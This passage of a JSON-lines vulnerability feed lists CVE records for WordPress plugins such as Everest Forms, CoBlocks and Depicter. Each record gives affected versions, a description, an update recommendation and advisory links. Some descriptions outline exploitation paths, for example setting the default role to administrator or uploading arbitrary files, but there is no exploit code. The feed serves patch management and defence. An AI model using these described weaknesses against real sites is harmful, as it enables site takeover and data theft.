\/cloud.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.23\\\/app\\\/views\\\/admin\\\/templates\\\/endpoints\\\/cloud.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.23\\\/app\\\/views\\\/admin\\\/connection.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.23\\\/app\\\/views\\\/admin\\\/connection.php#L110\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10589","slug":"leopard-wordpress-offload-media","versionImpact":"3.1.1","versionEndExcluding":"3.1.2","description":"The Leopard - WordPress Offload Media plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the import_settings() function in all versions up to, and including, 3.1.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 3.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0b50597-18c1-4cbc-aebb-348f4d786ad9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0b50597-18c1-4cbc-aebb-348f4d786ad9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/leopard-wordpress-offload-media\\\/23728788\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/leopard-wordpress-offload-media\\\/23728788\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3439","slug":"everest-forms","versionImpact":"3.1.1","versionEndExcluding":"3.1.2","description":"The Everest Forms \u2013 Contact Form, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.1 via deserialization of untrusted input from the 'field_value' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"Update to version 3.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/everest-forms\\\/trunk\\\/includes\\\/admin\\\/views\\\/html-admin-page-entries-view.php#L147\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/everest-forms\\\/trunk\\\/includes\\\/admin\\\/views\\\/html-admin-page-entries-view.php#L147\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268742\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268742\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e5617a2-5670-4d98-a36b-942f71634642?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e5617a2-5670-4d98-a36b-942f71634642?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3422","slug":"everest-forms","versionImpact":"3.1.1","versionEndExcluding":"3.1.2","description":"The Everest Forms \u2013 Contact Form, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.1.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","recommendation":"Update to version 3.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268742\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268742\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3db1d9a0-ea68-4979-a36d-864c649f7aca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3db1d9a0-ea68-4979-a36d-864c649f7aca?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3421","slug":"everest-forms","versionImpact":"3.1.1","versionEndExcluding":"3.1.2","description":"The Everest Forms \u2013 Contact Form, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'form_id' parameter in all versions up to, and including, 3.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268742\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268742\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d55737a5-8aa5-4c26-bbb5-bbc5ea8be8d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d55737a5-8aa5-4c26-bbb5-bbc5ea8be8d1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3245","slug":"chaty","versionEndExcluding":"3.1.2","description":"The Floating Chat Widget WordPress plugin before 3.1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f9f8ae7e-6621-4e29-9257-b8306dbe8811\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f9f8ae7e-6621-4e29-9257-b8306dbe8811\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4389","slug":"depicter","versionImpact":"3.1.1","versionEndExcluding":"3.1.2","description":"The Slider and Carousel slider by Depicter plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the uploadFile function in all versions up to, and including, 3.1.1. This makes it possible for authenticated attackers, with contributor access or higher, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81f025da-c28c-4a80-8b4f-27dae07b2b04?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81f025da-c28c-4a80-8b4f-27dae07b2b04?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/WordPress\\\/FileUploaderService.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/WordPress\\\/FileUploaderService.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108589\\\/depicter\\\/trunk\\\/app\\\/src\\\/WordPress\\\/FileUploaderService.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108589\\\/depicter\\\/trunk\\\/app\\\/src\\\/WordPress\\\/FileUploaderService.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2111","slug":"wp-headers-and-footers","versionImpact":"3.1.1","versionEndExcluding":"3.1.2","description":"The Insert Headers And Footers plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.1. This is due to missing or incorrect nonce validation on the 'custom_plugin_set_option' function. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site. The 'WPBRIGADE_SDK__DEV_MODE' constant must be set to 'true' to exploit the vulnerability.","recommendation":"Update to version 3.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-headers-and-footers\\\/trunk\\\/lib\\\/wpb-sdk\\\/views\\\/wpb-debug.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-headers-and-footers\\\/trunk\\\/lib\\\/wpb-sdk\\\/views\\\/wpb-debug.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-headers-and-footers\\\/trunk\\\/lib\\\/wpb-sdk\\\/views\\\/wpb-debug.php#L69\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-headers-and-footers\\\/trunk\\\/lib\\\/wpb-sdk\\\/views\\\/wpb-debug.php#L69\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3276361\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3276361\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b00d175-261d-46e3-bf3c-2d18f4e4972d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b00d175-261d-46e3-bf3c-2d18f4e4972d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4799","slug":"wp-embed-facebook","versionImpact":"3.1.1","versionEndExcluding":"3.1.2","description":"The Magic Embeds WordPress plugin through 3.0.10 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 3.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04c71873-5ae7-4f94-8ba9-03e03ff55180\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04c71873-5ae7-4f94-8ba9-03e03ff55180\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6571","slug":"imageseo","versionImpact":"3.1.1","versionEndExcluding":"3.1.2","description":"The Optimize Images ALT Text (alt tag) & names for SEO using AI plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.1.1. This is due the plugin utilizing cocur and not preventing direct access to the generate-default.php file. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 3.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a11083dd-7a5f-483b-a854-2697ddc54262?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a11083dd-7a5f-483b-a854-2697ddc54262?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3122915%40imageseo&new=3122915%40imageseo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3122915%40imageseo&new=3122915%40imageseo&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1061","slug":"nextend-social-login-pro","versionImpact":"3.1.16","versionEndExcluding":"3.1.17","description":"The Nextend Social Login Pro plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.1.16. This is due to insufficient verification on the user being supplied during the Apple OAuth authenticate request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","recommendation":"Update to version 3.1.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/nextendweb.com\\\/nextend-social-login-docs\\\/pro-addon-changelog\\\/\",\"name\":\"https:\\\/\\\/nextendweb.com\\\/nextend-social-login-docs\\\/pro-addon-changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/nextendweb.com\\\/nextend-social-login-docs\\\/provider-apple\\\/\",\"name\":\"https:\\\/\\\/nextendweb.com\\\/nextend-social-login-docs\\\/provider-apple\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6494e54c-db04-41f9-8b91-6ad12528cf01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6494e54c-db04-41f9-8b91-6ad12528cf01?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11194","slug":"classified-listing","versionImpact":"3.1.15.1","versionEndExcluding":"3.1.16","description":"The Classified Listing \u2013 Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a misconfigured check on the 'rtcl_import_settings' function in all versions up to, and including, 3.1.15.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update limited arbitrary options on the WordPress site. This can be leveraged to update the Subscriber role with Administrator-level capabilities to gain administrative user access to a vulnerable site. The vulnerability is limited in that the option updated must have a value that is an array.","recommendation":"Update to version 3.1.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13d9a59f-1a1a-4936-a5ab-8a5e0c50303b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13d9a59f-1a1a-4936-a5ab-8a5e0c50303b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/classified-listing\\\/tags\\\/3.1.12\\\/app\\\/Controllers\\\/Ajax\\\/Import.php#L473\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/classified-listing\\\/tags\\\/3.1.12\\\/app\\\/Controllers\\\/Ajax\\\/Import.php#L473\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/classified-listing\\\/tags\\\/3.1.12\\\/app\\\/Controllers\\\/Ajax\\\/Import.php#L309\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/classified-listing\\\/tags\\\/3.1.12\\\/app\\\/Controllers\\\/Ajax\\\/Import.php#L309\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189516\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189516\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8120","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.14","versionEndExcluding":"3.1.15","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.14. This is due to missing or incorrect nonce validation on several functions in the class\/class-image-otimizer.php file. This makes it possible for unauthenticated attackers to update plugin settings along with performing other actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.1.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a06bba7f-0259-4b87-b3fe-6ad8318fda7d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a06bba7f-0259-4b87-b3fe-6ad8318fda7d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119956\\\/imagerecycle-pdf-image-compression\\\/tags\\\/3.1.15\\\/class\\\/class-image-otimizer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119956\\\/imagerecycle-pdf-image-compression\\\/tags\\\/3.1.15\\\/class\\\/class-image-otimizer.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6631","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.14","versionEndExcluding":"3.1.15","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several AJAX actions in all versions up to, and including, 3.1.14. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform unauthorized actions, such as updating plugin settings.","recommendation":"Update to version 3.1.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f330bf36-0a39-40d6-a075-c87fdb9dc2da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f330bf36-0a39-40d6-a075-c87fdb9dc2da?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119956\\\/imagerecycle-pdf-image-compression\\\/tags\\\/3.1.15\\\/class\\\/class-image-otimizer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119956\\\/imagerecycle-pdf-image-compression\\\/tags\\\/3.1.15\\\/class\\\/class-image-otimizer.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7132","slug":"coblocks","versionImpact":"3.1.12","versionEndExcluding":"3.1.13","description":"The Page Builder Gutenberg Blocks  WordPress plugin before 3.1.13 does not escape the content of post embed via one of its block, which could allow users with the capability to publish posts (editor and admin by default) to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16deb743-6fe9-43a2-9586-d92cfe1daa17\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16deb743-6fe9-43a2-9586-d92cfe1daa17\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6447","slug":"full-customer","versionImpact":"3.1.12","versionEndExcluding":"3.1.13","description":"The FULL \u2013 Cliente plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the license plan parameter in all versions up to, and including, 3.1.12 due to insufficient input sanitization and output escaping as well as missing authorization and capability checks on the related functions. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that will execute whenever an administrative user accesses wp-admin dashboard","recommendation":"Update to version 3.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f3ad1e0-1ae3-44cd-aa2a-dbb3a1b531f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f3ad1e0-1ae3-44cd-aa2a-dbb3a1b531f9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.12\\\/app\\\/api\\\/Connection.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.12\\\/app\\\/api\\\/Connection.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.12\\\/app\\\/controller\\\/inc\\\/License.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.12\\\/app\\\/controller\\\/inc\\\/License.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.12\\\/app\\\/controller\\\/actions.php#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.12\\\/app\\\/controller\\\/actions.php#L125\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6491","slug":"strong-testimonials","versionImpact":"3.1.12","versionEndExcluding":"3.1.13","description":"The Strong Testimonials plugin for WordPress is vulnerable to unauthorized modification of data due to an improper capability check on the wpmtst_save_view_sticky function in all versions up to, and including, 3.1.12. This makes it possible for authenticated attackers, with contributor access and above, to modify favorite views.","recommendation":"Update to version 3.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3277d93-4f47-445b-a193-ff990b55d054?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3277d93-4f47-445b-a193-ff990b55d054?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097409\\\/strong-testimonials\\\/tags\\\/3.1.13\\\/admin\\\/views.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097409\\\/strong-testimonials\\\/tags\\\/3.1.13\\\/admin\\\/views.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2398","slug":"icegram","versionEndExcluding":"3.1.12","description":"The Icegram Engage WordPress plugin before 3.1.12 does not escape a parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16d47d20-58aa-4d04-9275-fd91ce926ff3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16d47d20-58aa-4d04-9275-fd91ce926ff3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4260","slug":"coblocks","versionImpact":"3.1.11","versionEndExcluding":"3.1.12","description":"The Page Builder Gutenberg Blocks  WordPress plugin before 3.1.12 does not prevent users from pinging arbitrary hosts via some of its shortcodes, which could allow high privilege users such as contributors to perform SSRF attacks.","recommendation":"Update to version 3.1.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/69f33e20-8ff4-491c-8f37-a4eadd4ea8cf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/69f33e20-8ff4-491c-8f37-a4eadd4ea8cf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3280","slug":"wpsite-follow-us-badges","versionImpact":"3.1.10","versionEndExcluding":"3.1.11","description":"The Follow Us Badges plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpsite_follow_us_badges shortcode in all versions up to, and including, 3.1.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef1ccef8-9066-4f5c-b5c5-9fa6e54f0e87?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef1ccef8-9066-4f5c-b5c5-9fa6e54f0e87?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078718\\\/wpsite-follow-us-badges\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078718\\\/wpsite-follow-us-badges\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9616","slug":"blockmeister","versionImpact":"3.1.10","versionEndExcluding":"3.1.11","description":"The BlockMeister \u2013 Block Pattern Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.1.10. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.1.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/584d4517-1152-42fa-9ea9-a9e9ed8996fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/584d4517-1152-42fa-9ea9-a9e9ed8996fa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blockmeister\\\/tags\\\/3.1.10\\\/includes\\\/Pattern_Builder\\\/Admin\\\/BlockMeister_Pattern_List_Table.php#L272\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blockmeister\\\/tags\\\/3.1.10\\\/includes\\\/Pattern_Builder\\\/Admin\\\/BlockMeister_Pattern_List_Table.php#L272\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blockmeister\\\/tags\\\/3.1.10\\\/includes\\\/JSON_File_Uploader.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blockmeister\\\/tags\\\/3.1.10\\\/includes\\\/JSON_File_Uploader.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3165925%40blockmeister&new=3165925%40blockmeister&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3165925%40blockmeister&new=3165925%40blockmeister&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blockmeister\\\/tags\\\/3.1.11\\\/includes\\\/JSON_File_Uploader.php?rev=3165925#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blockmeister\\\/tags\\\/3.1.11\\\/includes\\\/JSON_File_Uploader.php?rev=3165925#L31\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2933","slug":"coblocks","versionImpact":"3.1.9","versionEndExcluding":"3.1.10","description":"The Page Builder Gutenberg Blocks \u2013 CoBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Social Profiles widget in all versions up to, and including, 3.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/020d14f8-e8e2-4da2-9a4b-4d15cb0994c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/020d14f8-e8e2-4da2-9a4b-4d15cb0994c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coblocks\\\/tags\\\/3.1.7\\\/src\\\/blocks\\\/social-profiles\\\/index.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coblocks\\\/tags\\\/3.1.7\\\/src\\\/blocks\\\/social-profiles\\\/index.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3095285%40coblocks&new=3095285%40coblocks&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3095285%40coblocks&new=3095285%40coblocks&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
